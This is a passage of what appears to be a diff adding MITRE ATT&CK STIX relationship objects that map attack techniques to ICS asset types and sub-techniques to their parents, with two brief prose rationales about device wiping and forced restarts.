built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. On network devices, adversaries may leverage Disk Wipe to delete backup firmware images and reformat the file system, then System Shutdown/Reboot to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39e3301e-69c1-4e2e-b884-8aad7339ecbd", + "created": "2024-06-26T13:42:53.854Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:42:53.854Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39e5a489-f557-4130-a285-e0a82f40685c", + "created": "2023-09-28T19:46:38.112Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:46:38.112Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39f785a8-4175-4d3c-ba64-e20ad4bc2584", + "created": "2023-09-28T19:40:21.763Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:40:21.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a1dd3d5-94b8-46f3-b9a3-520796fab3af", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a20ed21-5e69-4a16-a0e3-bace3eba9974", + "created": "2023-09-29T18:56:47.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T01:24:28.585Z", + "description": "Asset Mapping Rationale: Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a4ce2a0-abd6-4b60-94cf-263a4bb56ba5", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a4e34aa-e9e9-4399-8aaa-a89fa808abac", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a53c211-191a-4953-8fab-159077bb89f8", + "created": "2020-03-10T17:45:00.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a71516c-41d3-4b92-a807-7887c417b129", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a76a181-8706-4bc4-9c66-7e809fec44ca", + "created": "2023-09-28T19:44:37.687Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:44:37.687Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a80c045-0bb0-42c9-900b-cc9ff6d65935", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a837390-7974-44e0-9d60-4c9831b8e272", + "created": "2020-02-19T18:52:25.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "target_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3a8d46db-67d4-46d8-a6f8-2b2a67c2fff4", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3aa2691d-d88d-4467-ae3e-242b3bac22ea", + "created": "2023-09-28T21:15:18.036Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:15:18.036Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3aab0ebc-fb1d-43ed-8a47-5817fe035dee", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3aafed9b-02dd-43ee-bc46-2738bf4db2c5", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ab1e2a2-5656-44ea-9c41-bf472d8f1526", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3abccc57-0ec4-45cb-9f73-d48076a52ab3", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3abe5db1-eaff-4595-b69a-0124b6f1b499", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ac5af7a-2304-4640-a94b-ac43f0059ccb", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ad966be-8cb2-42e6-b696-ef9e3b512e35", + "created": "2023-09-28T19:43:15.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:43:15.817Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3adc5b83-d39e-4e9b-8fa2-610a0093f0de", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b091d1a-d7da-4897-b4f4-265f21b1f177", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b2c6481-0779-48dc-ad8f-0b4c813f10cc", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b5cebc4-4d1e-46f6-bb4e-6e683ec08d75", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b601f1f-2f2c-4a29-aba5-c54fe6ede929", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b6a680a-d7bc-4d0b-b5d5-379faded7cdf", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b7f39cb-0101-49b0-ab02-a5adb1672688", + "created": "2023-09-28T19:53:33.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:53:33.603Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b8633ab-4fa5-4310-bd0f-80964ecfae41", + "created": "2020-02-20T21:08:52.969Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b8659ef-2c66-42eb-abbd-3cbb8e031dfe", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3b95b955-1cdc-4a26-bbaf-e8a2ce1ff7e1", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3bc61c8f-3d04-40bd-8239-a15913056bb2", + "created": "2023-10-02T20:22:15.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:22:15.908Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3bc96468-f592-4551-b085-80af05d0b57b", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3bcab2e6-9a23-43e2-8cbc-2e09b53258bd", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3bd3f060-fbfc-412b-968d-827e47e5e3aa", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3bdb0dad-0c0c-4ced-bac1-8a9c5c89bb09", + "created": "2023-09-07T21:48:42.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-07T21:48:42.771Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3bdfb695-b617-47ba-bfad-30ccf7f0ee92", + "created": "2021-03-17T20:33:20.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9", + "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "x_mitre_modified_by_ref": 